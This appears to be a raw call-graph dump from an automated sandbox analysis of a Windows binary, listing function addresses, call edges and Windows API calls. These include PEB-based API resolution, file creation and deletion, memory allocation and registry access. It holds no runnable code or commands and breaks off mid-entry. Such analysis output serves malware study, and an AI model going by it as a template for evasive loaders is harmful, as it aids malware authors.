40719a 8840->8841 8842 4071b0 8841->8842 8844 4071c5 8841->8844 8843 407644 6 API calls 8842->8843 8842->8844 8845 4071be 8843->8845 8847 406fd2 4 API calls 8844->8847 8848 407226 8844->8848 8846 406baa 6 API calls 8845->8846 8846->8844 8847->8848 8848->8717 8848->8719 8850 406f64 8849->8850 8853 406f75 8849->8853 8851 407644 6 API calls 8850->8851 8852 406f6e 8851->8852 8854 406baa 6 API calls 8852->8854 8853->8725 8854->8853 8896 4060ac 8855->8896 8878 407116 8877->8878 8879 40712b 8877->8879 8878->8879 8880 407644 6 API calls 8878->8880 8883 407187 8879->8883 8884 406fd2 4 API calls 8879->8884 8881 407124 8880->8881 8882 406baa 6 API calls 8881->8882 8882->8879 8883->8717 8884->8883 8886 4031e5 4 API calls 8885->8886 8887 4047d9 8886->8887 8887->8708 8889 406fde 8888->8889 8890 407027 8889->8890 8891 4031e5 4 API calls 8889->8891 8890->8840 8892 406ffa 8891->8892 8893 4031e5 4 API calls 8892->8893 8894 407011 8893->8894 8895 4031e5 4 API calls 8894->8895 8895->8890 8897 4031e5 4 API calls 8896->8897 8898 4060bb 8897->8898 8898->8898 8900 4031e5 4 API calls 8899->8900 8901 40591a 8900->8901 8901->8738 8903 4031e5 4 API calls 8902->8903 8904 405971 8903->8904 8904->8745 8906 4031e5 4 API calls 8905->8906 8907 4059ed 8906->8907 8908 402b7c 2 API calls 8907->8908 8911 405a38 8907->8911 8909 405a16 8908->8909 8910 4031e5 4 API calls 8909->8910 8909->8911 8910->8911 8911->8652 8913 4031e5 4 API calls 8912->8913 8914 4044b9 8913->8914 8914->8513 9834 40a349 9835 4098a7 13 API calls 9834->9835 9836 40a359 9835->9836 9073 408952 9094 40823f 9073->9094 9076 408960 9078 4056bf 2 API calls 9076->9078 9079 40896a 9078->9079 9122 408862 9079->9122 9081 413aca 4 API calls 9082 4089d4 9081->9082 9084 405695 2 API calls 9082->9084 9083 408975 9091 4089c4 9083->9091 9130 4087d6 9083->9130 9086 4089df 9084->9086 9091->9081 9092 402bab 2 API calls 9093 40899d 9092->9093 9093->9091 9093->9092 9095 40824d 9094->9095 9096 40831b 9095->9096 9097 4031e5 4 API calls 9095->9097 9096->9076 9110 4083bb 9096->9110 9098 40826d 9097->9098 9099 4031e5 4 API calls 9098->9099 9100 408289 9099->9100 9101 4031e5 4 API calls 9100->9101 9102 4082a5 9101->9102 9103 4031e5 4 API calls 9102->9103 9104 4082c1 9103->9104 9105 4031e5 4 API calls 9104->9105 9106 4082e2 9105->9106 9107 4031e5 4 API calls 9106->9107 9108 4082ff 9107->9108 9109 4031e5 4 API calls 9108->9109 9109->9096 9158 408363 9110->9158 9113 4084ab 9113->9076 9114 4056bf 2 API calls 9119 4083f4 9114->9119 9115 408492 9116 413aca 4 API calls 9115->9116 9117 4084a0 9116->9117 9118 405695 2 API calls 9117->9118 9118->9113 9119->9115 9161 40815d 9119->9161 9176 40805d 9119->9176 9191 404b8f 9122->9191 9124 408946 9124->9083 9125 40887e 9125->9124 9126 4031e5 4 API calls 9125->9126 9127 40893e 9125->9127 9129 402b7c 2 API calls 9125->9129 9126->9125 9194 404a39 9127->9194 9129->9125 9131 402b7c 2 API calls 9130->9131 9132 4087e7 9131->9132 9133 40885a 9132->9133 9134 4031e5 4 API calls 9132->9134 9142 408749 9133->9142 9135 408802 9134->9135 9138 40884d 9135->9138 9141 408853 9135->9141 9203 408522 9135->9203 9207 4084b4 9135->9207 9136 402bab 2 API calls 9136->9133 9210 4084d4 9138->9210 9141->9136 9143 404b8f 5 API calls 9142->9143 9145 408765 9143->9145 9144 4031e5 4 API calls 9144->9145 9145->9144 9146 408522 4 API calls 9145->9146 9147 4087c7 9145->9147 9149 4087cf 9145->9149 9146->9145 9148 404a39 5 API calls 9147->9148 9148->9149 9150 4085d1 9149->9150 9152 4086c2 9150->9152 9156 4085e9 9150->9156 9152->9093 9153 402bab 2 API calls 9153->9156 9154 4031e5 4 API calls 9154->9156 9156->9152 9156->9153 9156->9154 9216 4089e6 9156->9216 9235 4086c9 9156->9235 9239 4036a3 9156->9239 9159 4031e5 4 API calls 9158->9159 9160 408386 9159->9160 9160->9113 9160->9114 9162 40816f 9161->9162 9163 4081b6 9162->9163 9164 4081fd 9162->9164 9175 4081ef 9162->9175 9165 405872 4 API calls 9163->9165 9166 405872 4 API calls 9164->9166 9167 4081cf 9165->9167 9168 408213 9166->9168 9169 405872 4 API calls 9167->9169 9170 405872 4 API calls 9168->9170 9171 4081df 9169->9171 9172 408222 9170->9172 9173 405872 4 API calls 9171->9173 9174 405872 4 API calls 9172->9174 9173->9175 9174->9175 9175->9119 9177 40808c 9176->9177 9178 4080d2 9177->9178 9179 408119 9177->9179 9190 40810b 9177->9190 9181 405872 4 API calls 9178->9181 9180 405872 4 API calls 9179->9180 9182 40812f 9180->9182 9183 4080eb 9181->9183 9185 405872 4 API calls 9182->9185 9184 405872 4 API calls 9183->9184 9186 4080fb 9184->9186 9187 40813e 9185->9187 9188 405872 4 API calls 9186->9188 9189 405872 4 API calls 9187->9189 9188->9190 9189->9190 9190->9119 9197 404a19 9191->9197 9193 404ba0 9193->9125 9200 4049ff 9194->9200 9196 404a44 9196->9124 9198 4031e5 4 API calls 9197->9198 9199 404a2c RegOpenKeyW 9198->9199 9199->9193 9201 4031e5 4 API calls 9200->9201 9202 404a12 RegCloseKey 9201->9202 9202->9196 9205 408534 9203->9205 9204 4085af 9204->9135 9205->9204 9213 4084ee 9205->9213 9208 4031e5 4 API calls 9207->9208 9209 4084c7 9208->9209 9209->9135 9211 4031e5 4 API calls 9210->9211 9212 4084e7 9211->9212 9212->9141 9214 4031e5 4 API calls 9213->9214 9215 408501 9214->9215 9215->9204 9217 4031e5 4 API calls 9216->9217 9218 408a06 9217->9218 9219 408b21 9218->9219 9220 4031e5 4 API calls 9218->9220 9219->9156 9221 408a32 9220->9221 9228 408b17 9221->9228 9242 403666 9221->9242 9225 408b0e 9248 40362f 9225->9248 9226 4031e5 4 API calls 9229 408a88 9226->9229 9251 403649 9228->9251 9229->9225 9230 4031e5 4 API calls 9229->9230 9231 408ac4 9230->9231 9232 405b6f 6 API calls 9231->9232 9233 408aff 9232->9233 9233->9225 9245 408508 9233->9245 9236 4086e2 9235->9236 9237 408744 9235->9237 9236->9237 9238 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9236->9238 9237->9156 9238->9236 9240 4031e5 4 API calls 9239->9240 9241 4036b5 9240->9241 9241->9156 9243 4031e5 4 API calls 9242->9243 9244 403679 9243->9244 9244->9225 9244->9226 9246 4031e5 4 API calls 9245->9246 9247 40851b 9246->9247 9247->9225 9249 4031e5 4 API calls 9248->9249 9250 403642 9249->9250 9250->9228 9252 4031e5 4 API calls 9251->9252 9253 40365c 9252->9253 9253->9219 9854 40f252 9855 404bee 6 API calls 9854->9855 9856 40f269 9855->9856 9857 404bee 6 API calls 9856->9857 9863 40f2ff 9856->9863 9858 40f282 9857->9858 9859 404bee 6 API calls 9858->9859 9860 40f290 9859->9860 9871 404c4e 9860->9871 9862 40f2a7 9862->9863 9864 405872 4 API calls 9862->9864 9865 40f2cd 9864->9865 9866 405872 4 API calls 9865->9866 9867 40f2dc 9866->9867 9868 405872 4 API calls 9867->9868 9869 40f2ee 9868->9869 9870 405762 4 API calls 9869->9870 9870->9863 9872 402b7c 2 API calls 9871->9872 9874 404c60 9872->9874 9873 404ca4 9873->9862 9874->9873 9875 4031e5 4 API calls 9874->9875 9876 404c8d 9875->9876 9876->9873 9877 402bab 2 API calls 9876->9877 9877->9873 9878 41045c 9879 4040bb 12 API calls 9878->9879 9880 410477 9879->9880 9881 41060b 9880->9881 9909 407851 9880->9909 9883 41048f 9885 407851 2 API calls 9883->9885 9889 410604 9883->9889 9884 403f9e 5 API calls 9884->9881 9886 4104a9 9885->9886 9891 4105e0 9886->9891 9892 405ae9 6 API calls 9886->9892 9894 41056f 9886->9894 9895 4105eb 9886->9895 9887 402bab 2 API calls 9887->9889 9888 402bab 2 API calls 9890 4105fb 9888->9890 9889->9884 9890->9887 9893 402bab 2 API calls 9891->9893 9891->9895 9892->9886 9893->9895 9894->9891 9896 4105d6 9894->9896 9898 412269 6 API calls 9894->9898 9895->9888 9895->9890 9897 402bab 2 API calls 9896->9897 9897->9891 9899 410580 9898->9899 9899->9896 9900 405872 4 API calls 9899->9900 9901 410599 9900->9901 9902 405872 4 API calls 9901->9902 9903 4105a9 9902->9903 9904 405872 4 API calls 9903->9904 9905 4105bb 9904->9905 9906 405872 4 API calls 9905->9906 9907 4105cd 9906->9907 9908 402bab 2 API calls 9907->9908 9908->9896 9910 407866 9909->9910 9911 402b7c 2 API calls 9910->9911 9912 407899 9910->9912 9911->9912 9912->9883 9315 40f561 9318 40f4b6 9315->9318 9319 413b28 6 API calls 9318->9319 9324 40f4bf 9319->9324 9320 40f559 9321 405b6f 6 API calls 9321->9324 9322 402bab GetProcessHeap HeapFree 9322->9324 9323 413a58 13 API calls 9323->9324 9324->9320 9324->9321 9324->9322 9324->9323 9328 403b64 9329 4031e5 4 API calls 9328->9329 9330 403b77 PathFileExistsW 9329->9330 9944 40d069 9945 404bee 6 API calls 9944->9945 9946 40d080 9945->9946 9947 404bee 6 API calls 9946->9947 9968 40d1e2 9946->9968 9948 40d099 9947->9948 9949 404bee 6 API calls 9948->9949 9950 40d0a7 9949->9950 9985 404ba7 9950->9985 9953 404bee 6 API calls 9954 40d0c5 9953->9954 9955 404c4e 6 API calls 9954->9955 9956 40d0dc 9955->9956 9957 404bee 6 API calls 9956->9957 9958 40d0eb 9957->9958 9959 404ba7 4 API calls 9958->9959 9960 40d0fa 9959->9960 9961 404bee 6 API calls 9960->9961 9962 40d109 9961->9962 9963 404c4e 6 API calls 9962->9963 9964 40d123 9963->9964 9965 405872 4 API calls 9964->9965 9964->9968 9966 40d14a 9965->9966 9967 405872 4 API calls 9966->9967 9969 40d159 9967->9969 9970 405872 4 API calls 9969->9970 9971 40d16b 9970->9971 9972 405781 4 API calls 9971->9972 9973 40d179 9972->9973 9974 405872 4 API calls 9973->9974 9975 40d18b 9974->9975 9976 405762 4 API calls 9975->9976 9977 40d19f 9976->9977 9978 405872 4 API calls 9977->9978 9979 40d1b1 9978->9979 9980 405781 4 API calls 9979->9980 9981 40d1bf 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d1d1 9982->9983 9984 405762 4 API calls 9983->9984 9984->9968 9986 4031e5 4 API calls 9985->9986 9987 404bca 9986->9987 9987->9953 9357 40f16e 9358 4056bf 2 API calls 9357->9358 9359 40f17b 9358->9359 9360 412093 20 API calls 9359->9360 9361 40f19e 9360->9361 9362 412093 20 API calls 9361->9362 9363 40f1b6 9362->9363 9364 412093 20 API calls 9363->9364 9365 40f1cc 9364->9365 9366 412093 20 API calls 9365->9366 9367 40f1e2 9366->9367 9368 413aca 4 API calls 9367->9368 9369 40f1ef 9368->9369 9370 405695 2 API calls 9369->9370 9371 40f1fa 9370->9371 9372 40ce71 9373 413b28 6 API calls 9372->9373 9374 40ce78 9373->9374 9375 405b6f 6 API calls 9374->9375 9378 40ce83 9375->9378 9376 40cec1 9377 403fbf 7 API calls 9376->9377 9379 40cecc 9377->9379 9378->9376 9380 403d74 19 API calls 9378->9380 9390 40ceba 9378->9390 9382 403d74 19 API calls 9379->9382 9389 40cefb 9379->9389 9384 40cead 9380->9384 9381 402bab 2 API calls 9381->9376 9383 40cee7 9382->9383 9385 402bab 2 API calls 9383->9385 9388 40cef4 9383->9388 9387 402bab 2 API calls 9384->9387 9384->9390 9385->9388 9386 402bab 2 API calls 9386->9389 9387->9390 9388->9386 9390->9381 9391 406472 9392 4031e5 4 API calls 9391->9392 9393 406484 Sleep 9392->9393 10061 40f204 10062 405781 4 API calls 10061->10062 10063 40f214 10062->10063 10064 4057df 13 API calls 10063->10064 10065 40f226 10064->10065 9451 403c08 9452 4031e5 4 API calls 9451->9452 9453 403c1a DeleteFileW 9452->9453 9454 410a09 9455 41219c 14 API calls 9454->9455 9456 410a1b 9455->9456 9457 41219c 14 API calls 9456->9457 9458 410a23 9457->9458 9459 41219c 14 API calls 9458->9459 9460 410a2c 9459->9460 9461 41219c 14 API calls 9460->9461 9462 410a38 9461->9462 9463 404b22 6 API calls 9462->9463 9464 410a4c 9463->9464 9465 410a7a 9464->9465 9466 403fbf 7 API calls 9464->9466 9467 410a5c 9466->9467 9468 410a71 9467->9468 9469 413a58 13 API calls 9467->9469 9470 402bab 2 API calls 9468->9470 9471 410a6b 9469->9471 9470->9465 9472 402bab 2 API calls 9471->9472 9472->9468 10066 410d09 10067 410d56 10066->10067 10068 410d17 10066->10068 10070 413a58 13 API calls 10067->10070 10082 406642 10068->10082 10072 410d6f 10070->10072 10073 4056bf 2 API calls 10074 410d2e 10073->10074 10095 405641 10074->10095 10076 410d41 10077 413aca 4 API calls 10076->10077 10078 410d4a 10077->10078 10079 405695 2 API calls 10078->10079 10080 410d50 10079->10080 10081 4036a3 4 API calls 10080->10081 10081->10067 10083 406662 10082->10083 10084 4031e5 4 API calls 10083->10084 10085 406676 10084->10085 10099 4066bf 10085->10099 10090 4066b1 10092 4036a3 4 API calls 10090->10092 10091 4066a7 10093 4036a3 4 API calls 10091->10093 10094 4066ac 10092->10094 10093->10094 10094->10067 10094->10073 10096 40564d 10095->10096 10097 405673 10095->10097 10096->10097 10098 4056fc 4 API calls 10096->10098 10097->10076 10098->10097 10100 4031e5 4 API calls 10099->10100 10101 4066dc 10100->10101 10102 4066f6 SetLastError 10101->10102 10103 406708 GetLastError 10101->10103 10104 406693 10102->10104 10103->10104 10105 406713 10103->10105 10121 406455 10104->10121 10106 4031e5 4 API calls 10105->10106 10107 406725 10106->10107 10107->10104 10108 4031e5 4 API calls 10107->10108 10109 40673f 10108->10109 10110 406753 10109->10110 10111 406749 10109->10111 10112 4031e5 4 API calls 10110->10112 10113 4036a3 4 API calls 10111->10113 10114 406761 10112->10114 10113->10104 10115 40678a 10114->10115 10116 40677c 10114->10116 10118 4036a3 4 API calls 10115->10118 10117 4036a3 4 API calls 10116->10117 10119 406781 10117->10119 10118->10104 10120 4036a3 4 API calls 10119->10120 10120->10104 10122 4031e5 4 API calls 10121->10122 10123 406468 10122->10123 10123->10090 10123->10091 9473 40c509 9474 412093 20 API calls 9473->9474 9475 40c51e 9474->9475 9482 40910d 9483 404b22 6 API calls 9482->9483 9484 409124 9483->9484 9485 40917a 9484->9485 9486 405b6f 6 API calls 9484->9486 9487 40913e 9486->9487 9489 404b22 6 API calls 9487->9489 9495 409173 9487->9495 9488 402bab 2 API calls 9488->9485 9490 409153 9489->9490 9491 40916a 9490->9491 9493 409408 15 API calls 9490->9493 9492 402bab 2 API calls 9491->9492 9492->9495 9494 409164 9493->9494 9496 402bab 2 API calls 9494->9496 9495->9488 9496->9491 9500 410410 9501 4056bf 2 API calls 9500->9501 9502 41041b 9501->9502 9503 412093 20 API calls 9502->9503 9504 41043c 9503->9504 9505 413aca 4 API calls 9504->9505 9506 410449 9505->9506 9507 405695 2 API calls 9506->9507 9508 410454 9507->9508 9535 40c71a 9536 41219c 14 API calls 9535->9536 9537 40c728 9536->9537 10179 410b1a 10180 404bee 6 API calls 10179->10180 10182 410b31 10180->10182 10181 410c6d 10182->10181 10183 404bee 6 API calls 10182->10183 10184 410b5a 10183->10184 10185 404bee 6 API calls 10184->10185 10186 410b69 10185->10186 10187 404bee 6 API calls 10186->10187 10188 410b78 10187->10188 10189 404ba7 4 API calls 10188->10189 10190 410b86 10189->10190 10191 404ba7 4 API calls 10190->10191 10192 410b95 10191->10192 10192->10181 10193 405872 4 API calls 10192->10193 10194 410bd7 10193->10194 10195 405872 4 API calls 10194->10195 10196 410be8 10195->10196 10197 405872 4 API calls 10196->10197 10198 410bf9 10197->10198 10199 405781 4 API calls 10198->10199 10200 410c07 10199->10200 10201 405781 4 API calls 10200->10201 10205 410c15 10201->10205 10202 410c4e 10203 405762 4 API calls 10202->10203 10204 410c60 10203->10204 10204->10181 10207 403f9e 5 API calls 10204->10207 10205->10202 10212 405e5a 10205->10212 10207->10181 10209 4040bb 12 API calls 10210 410c44 10209->10210 10211 402bab 2 API calls 10210->10211 10211->10202 10213 402b7c 2 API calls 10212->10213 10215 405e72 10213->10215 10214 405ea3 10214->10202 10214->10209 10215->10214 10216 4031e5 4 API calls 10215->10216 10217 405e94 10216->10217 10217->10214 10218 402bab 2 API calls 10217->10218 10218->10214 10219 40f81c 10220 404bee 6 API calls 10219->10220 10221 40f833 10220->10221 10222 404bee 6 API calls 10221->10222 10236 40f94f 10221->10236 10223 40f85c 10222->10223 10224 404bee 6 API calls 10223->10224 10225 40f86b 10224->10225 10226 404bee 6 API calls 10225->10226 10227 40f87a 10226->10227 10228 404bee 6 API calls 10227->10228 10229 40f888 10228->10229 10230 404ba7 4 API calls 10229->10230 10231 40f897 10230->10231 10232 405872 4 API calls 10231->10232 10231->10236 10233 40f8d8 10232->10233 10234 405872 4 API calls 10233->10234 10235 40f8ea 10234->10235 10237 405872 4 API calls 10235->10237 10238 40f8fa 10237->10238 10239 405872 4 API calls 10238->10239 10240 40f90c 10239->10240 10241 405781 4 API calls 10240->10241 10242 40f91d 10241->10242 10243 4040bb 12 API calls 10242->10243 10244 40f92d 10243->10244 10245 405762 4 API calls 10244->10245 10246 40f93f 10245->10246 10246->10236 10247 403f9e 5 API calls 10246->10247 10247->10236 9550 402c1f 9551 4031e5 4 API calls 9550->9551 9552 402c31 LoadLibraryW 9551->9552 10257 407e1f 10258 407e2c 10257->10258 10265 407e61 10257->10265 10260 407e3e 10258->10260 10263 402bab 2 API calls 10258->10263 10266 407e51 10258->10266 10259 407ea6 10261 407eb6 10259->10261 10264 402bab 2 API calls 10259->10264 10262 407ed4 10260->10262 10267 402bab 2 API calls 10260->10267 10261->10266 10268 402bab 2 API calls 10261->10268 10263->10260 10264->10261 10265->10259 10265->10261 10269 405872 4 API calls 10265->10269 10266->10262 10270 402bab 2 API calls 10266->10270 10267->10266 10268->10266 10271 407e86 10269->10271 10270->10262 10272 405872 4 API calls 10271->10272 10273 407e96 10272->10273 10274 405872 4 API calls 10273->10274 10274->10259 9565 405924 9566 4031e5 4 API calls 9565->9566 9567 405937 StrStrW 9566->9567 10283 410927 10284 4044ee 7 API calls 10283->10284 10285 41093d 10284->10285 10286 4109a4 10285->10286 10287 4056bf 2 API calls 10285->10287 10290 410954 10287->10290 10288 4044ee 7 API calls 10288->10290 10290->10288 10291 402bab 2 API calls 10290->10291 10292 410990 10290->10292 10298 41080e 10290->10298 10291->10290 10293 413aca 4 API calls 10292->10293 10294 410998 10293->10294 10295 405695 2 API calls 10294->10295 10296 41099e 10295->10296 10297 402bab 2 API calls 10296->10297 10297->10286 10299 410821 10298->10299 10309 41091f 10299->10309 10310 410701 10299->10310 10302 405872 4 API calls 10303 410900 10302->10303 10304 405872 4 API calls 10303->10304 10305 41090d 10304->10305 10306 405872 4 API calls 10305->10306 10307 410919 10306->10307 10308 402bab 2 API calls 10307->10308 10308->10309 10309->10290 10311 405f08 4 API calls 10310->10311 10313 410713 10311->10313 10312 410804 10312->10302 10312->10309 10313->10312 10314 402b7c 2 API calls 10313->10314 10318 410748 10314->10318 10315 4107fd 10316 402bab 2 API calls 10315->10316 10316->10312 10317 402b7c 2 API calls 10320 4107ad 10317->10320 10318->10315 10318->10317 10319 402bab 2 API calls 10319->10315 10320->10319 10321 40d726 10322 404bee 6 API calls 10321->10322 10323 40d73f 10322->10323 10324 40db63 10323->10324 10325 405872 4 API calls 10323->10325 10328 40d761 10325->10328 10326 404bee 6 API calls 10326->10328 10327 405872 4 API calls 10327->10328 10328->10326 10328->10327 10329 40d971 10328->10329 10330 404ba7 4 API calls 10329->10330 10331 405781 4 API calls 10329->10331 10336 40d9bb 10329->10336 10330->10329 10331->10329 10332 404c4e 6 API calls 10332->10336 10333 405781 4 API calls 10333->10336 10334 4037be 4 API calls 10334->10336 10335 405872 4 API calls 10335->10336 10336->10324 10336->10332 10336->10333 10336->10334 10336->10335 9623 40f12f 9624 41219c 14 API calls 9623->9624 9625 40f13f 9624->9625 9626 41219c 14 API calls 9625->9626 9627 40f14c 9626->9627 9628 41219c 14 API calls 9627->9628 9629 40f159 9628->9629 9630 41219c 14 API calls 9629->9630 9631 40f166 9630->9631 9638 40ed35 9639 4056bf 2 API calls 9638->9639 9640 40ed42 9639->9640 9641 412093 20 API calls 9640->9641 9642 40ed63 9641->9642 9643 412093 20 API calls 9642->9643 9644 40ed73 9643->9644 9645 413aca 4 API calls 9644->9645 9646 40ed80 9645->9646 9647 405695 2 API calls 9646->9647 9648 40ed8e 9647->9648 8092 40f3c5 8097 41219c 8092->8097 8095 41219c 14 API calls 8096 40f3e1 8095->8096 8098 4121b1 8097->8098 8105 40f3d3 8097->8105 8099 4121be 8098->8099 8103 4121c5 8098->8103 8145 413ba4 8099->8145 8100 4121ca 8115 404056 8100->8115 8103->8100 8108 412210 8103->8108 8104 4121c3 8104->8105 8122 405b6f 8104->8122 8105->8095 8108->8105 8150 403fbf 8108->8150 8110 402bab 2 API calls 8110->8105 8114 41224d 8114->8105 8114->8110 8161 402b7c GetProcessHeap RtlAllocateHeap 8115->8161 8117 404066 8119 404095 8117->8119 8163 4031e5 8117->8163 8119->8104 8121 402bab 2 API calls 8121->8119 8123 405b7d 8122->8123 8124 402b7c 2 API calls 8123->8124 8125 405b99 8124->8125 8131 405c02 8125->8131 8199 4059b8 8125->8199 8127 405c09 8129 402bab 2 API calls 8127->8129 8128 405bba 8128->8127 8130 402b7c 2 API calls 8128->8130 8129->8131 8132 405bdd 8130->8132 8131->8114 8135 413a58 8131->8135 8132->8127 8133 405be4 8132->8133 8134 402bab 2 API calls 8133->8134 8134->8131 8136 412245 8135->8136 8137 413a63 8135->8137 8158 402bab 8136->8158 8137->8136 8202 405781 8137->8202 8140 405781 4 API calls 8141 413aa0 8140->8141 8205 4057df 8141->8205 8144 405781 4 API calls 8144->8136 8146 413bad 8145->8146 8147 404056 6 API calls 8146->8147 8149 413bb8 8146->8149 8148 413bc5 8147->8148 8148->8104 8149->8104 8151 402b7c 2 API calls 8150->8151 8153 403fcf 8151->8153 8152 403ff4 8152->8104 8153->8152 8324 403b98 8153->8324 8156 403ff8 GetLastError 8157 402bab 2 API calls 8156->8157 8157->8152 8159 402bb4 GetProcessHeap HeapFree 8158->8159 8160 402bc6 8158->8160 8159->8160 8160->8114 8162 402b98 8161->8162 8162->8117 8164 4031f3 8163->8164 8165 403236 8163->8165 8164->8165 8168 403208 8164->8168 8174 4030a5 8165->8174 8167 403224 8169 403258 8167->8169 8171 4031e5 4 API calls 8167->8171 8180 403263 8168->8180 8169->8119 8169->8121 8171->8169 8172 40320d 8172->8169 8173 4030a5 4 API calls 8172->8173 8173->8167 8186 402ca4 8174->8186 8176 4030b0 8177 4030b5 8176->8177 8190 4030c4 8176->8190 8177->8167 8181 40326d 8180->8181 8182 402b7c 2 API calls 8181->8182 8185 4032b7 8181->8185 8183 40328c 8182->8183 8184 402b7c 2 API calls 8183->8184 8184->8185 8185->8172 8187 403079 8186->8187 8189 40307c 8187->8189 8194 40317b GetPEB 8187->8194 8189->8176 8193 4030eb 8190->8193 8191 4030c0 8191->8167 8193->8191 8196 402c03 8193->8196 8195 40319b 8194->8195 8195->8189 8197 4031e5 3 API calls 8196->8197 8198 402c15 GetProcAddress 8197->8198 8198->8191 8200 4031e5 4 API calls 8199->8200 8201 4059cb 8200->8201 8201->8128 8220 405797 8202->8220 8204 405792 8204->8140 8206 4057eb 8205->8206 8219 405832 8205->8219 8206->8219 8230 4040bb 8206->8230 8209 405839 8211 405853 8209->8211 8257 405627 8209->8257 8210 40582c 8254 403f9e 8210->8254 8268 405762 8211->8268 8218 403f9e 5 API calls 8218->8219 8219->8136 8219->8144 8221 4057a1 8220->8221 8222 4057bd 8220->8222 8221->8222 8224 4056fc 8221->8224 8222->8204 8225 405714 8224->8225 8226 402b7c 2 API calls 8225->8226 8227 405730 8226->8227 8228 402bab 2 API calls 8227->8228 8229 405752 8227->8229 8228->8229 8229->8222 8231 4031e5 4 API calls 8230->8231 8232 4040d5 CreateFileW 8231->8232 8233 4040f8 8232->8233 8234 40418d 8232->8234 8235 4031e5 4 API calls 8233->8235 8236 404183 8234->8236 8274 403c90 8234->8274 8242 404105 8235->8242 8236->8209 8236->8210 8236->8219 8240 40416d 8271 403c40 8240->8271 8242->8240 8246 4031e5 4 API calls 8242->8246 8244 4040bb 9 API calls 8250 4041c8 8244->8250 8245 402bab 2 API calls 8245->8236 8247 404131 VirtualAlloc 8246->8247 8247->8240 8248 404142 8247->8248 8249 4031e5 4 API calls 8248->8249 8251 40414f ReadFile 8249->8251 8250->8245 8251->8240 8252 404160 8251->8252 8253 4031e5 4 API calls 8252->8253 8253->8240 8255 4031e5 4 API calls 8254->8255 8256 403fb1 VirtualFree 8255->8256 8256->8219 8258 4031e5 4 API calls 8257->8258 8259 40563a 8258->8259 8260 405872 8259->8260 8262 405881 8260->8262 8261 4058bc 8263 405797 4 API calls 8261->8263 8265 4058af 8261->8265 8262->8261 8321 4058d4 8262->8321 8263->8265 8265->8211 8267 405781 4 API calls 8267->8261 8269 405781 4 API calls 8268->8269 8270 405770 8269->8270 8270->8218 8272 4031e5 4 API calls 8271->8272 8273 403c52 CloseHandle 8272->8273 8273->8236 8275 403ca3 8274->8275 8276 403caa 8274->8276 8301 405dc5 8275->8301 8278 404056 6 API calls 8276->8278 8281 403d3a 8276->8281 8279 403cbe 8278->8279 8280 403d2e 8279->8280 8282 403d17 8279->8282 8283 403ccf 8279->8283 8280->8281 8286 402bab 2 API calls 8280->8286 8281->8236 8297 403c59 8281->8297 8284 405b6f 6 API calls 8282->8284 8285 405b6f 6 API calls 8283->8285 8287 403d14 8284->8287 8288 403cdd 8285->8288 8286->8281 8290 402bab 2 API calls 8287->8290 8289 405b6f 6 API calls 8288->8289 8291 403cee 8289->8291 8290->8280 8291->8287 8306 403d4d 8291->8306 8294 403d0b 8296 402bab 2 API calls 8294->8296 8296->8287 8298 403c21 8297->8298 8299 4031e5 4 API calls 8298->8299 8300 403c33 8299->8300 8300->8244 8300->8250 8315 406799 8301->8315 8303 405dd5 8304 402b7c 2 API calls 8303->8304 8305 405dfe 8304->8305 8305->8276 8318 403bb7 8306->8318 8308 403cfe 8308->8294 8309 403c62 8308->8309 8310 403d4d 5 API calls 8309->8310 8311 403c6d 8310->8311 8312 403c72 8311->8312 8313 4031e5 4 API calls 8311->8313 8312->8294 8314 403c87 CreateDirectoryW 8313->8314 8314->8294 8316 4031e5 4 API calls 8315->8316 8317 4067ad 8316->8317 8317->8303 8319 4031e5 4 API calls 8318->8319 8320 403bc9 GetFileAttributesW 8319->8320 8320->8308 8322 405797 4 API calls 8321->8322 8323 4058a8 8322->8323 8323->8265 8323->8267 8325 4031e5 4 API calls 8324->8325 8326 403baa 8325->8326 8326->8152 8326->8156 9763 40ebc6 9764 4040bb 12 API calls 9763->9764 9765 40ebdf 9764->9765 9766 40ecd7 9765->9766 9783 407795 9765->9783 9769 40eccd 9770 403f9e 5 API calls 9769->9770 9770->9766 9771 4056bf 2 API calls 9781 40ec12 9771->9781 9772 40ecb5 9773 402bab 2 API calls 9772->9773 9774 40ecbd 9773->9774 9775 413aca 4 API calls 9774->9775 9776 40ecc7 9775->9776 9777 405695 2 API calls 9776->9777 9777->9769 9778 407908 GetProcessHeap RtlAllocateHeap 9778->9781 9780 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9780->9781 9781->9772 9781->9778 9781->9780 9782 402bab GetProcessHeap HeapFree 9781->9782 9794 412269 9781->9794 9782->9781 9785 4077ab 9783->9785 9784 4077b3 9784->9769 9784->9771 9785->9784 9801 405ae9 9785->9801 9787 4077e1 9787->9784 9788 407802 9787->9788 9789 4077f8 9787->9789 9791 402b7c 2 API calls 9788->9791 9790 402bab 2 API calls 9789->9790 9790->9784 9793 407811 9791->9793 9792 402bab 2 API calls 9792->9784 9793->9792 9817 40374e 9794->9817 9799 402bab 2 API calls 9800 412299 9799->9800 9800->9781 9802 405af7 9801->9802 9803 402b7c 2 API calls 9802->9803 9805 405b03 9803->9805 9804 405b5a 9804->9787 9805->9804 9814 405998 9805->9814 9807 405b21 9808 405b61 9807->9808 9810 402b7c 2 API calls 9807->9810 9809 402bab 2 API calls 9808->9809 9809->9804 9811 405b39 9810->9811 9811->9808 9812 405b40 9811->9812 9813 402bab 2 API calls 9812->9813 9813->9804 9815 4031e5 4 API calls 9814->9815 9816 4059ab 9815->9816 9816->9807 9818 402b7c 2 API calls 9817->9818 9820 40375f 9818->9820 9819 4037a3 9819->9800 9824 4037be 9819->9824 9820->9819 9821 4031e5 4 API calls 9820->9821 9822 40378f 9821->9822 9822->9819 9823 402bab 2 API calls 9822->9823 9823->9819 9825 4031e5 4 API calls 9824->9825 9826 4037e2 9825->9826 9827 40382b 9826->9827 9828 402b7c 2 API calls 9826->9828 9827->9799 9829 403802 9828->9829 9830 403832 9829->9830 9832 403809 9829->9832 9831 4036a3 4 API calls 9830->9831 9831->9827 9833 4036a3 4 API calls 9832->9833 9833->9827 8924 410cd1 8929 412093 8924->8929 8927 412093 20 API calls 8928 410cff 8927->8928 8931 4120a5 8929->8931 8950 410cf1 8929->8950 8930 4120b3 8932 404056 6 API calls 8930->8932 8931->8930 8935 412100 8931->8935 8933 4120ba 8932->8933 8934 405b6f 6 API calls 8933->8934 8937 412152 8933->8937 8933->8950 8940 412125 8934->8940 8936 403fbf 7 API calls 8935->8936 8935->8950 8936->8933 8951 403d74 8937->8951 8940->8937 8942 412139 8940->8942 8943 41214d 8940->8943 8941 41218c 8945 402bab 2 API 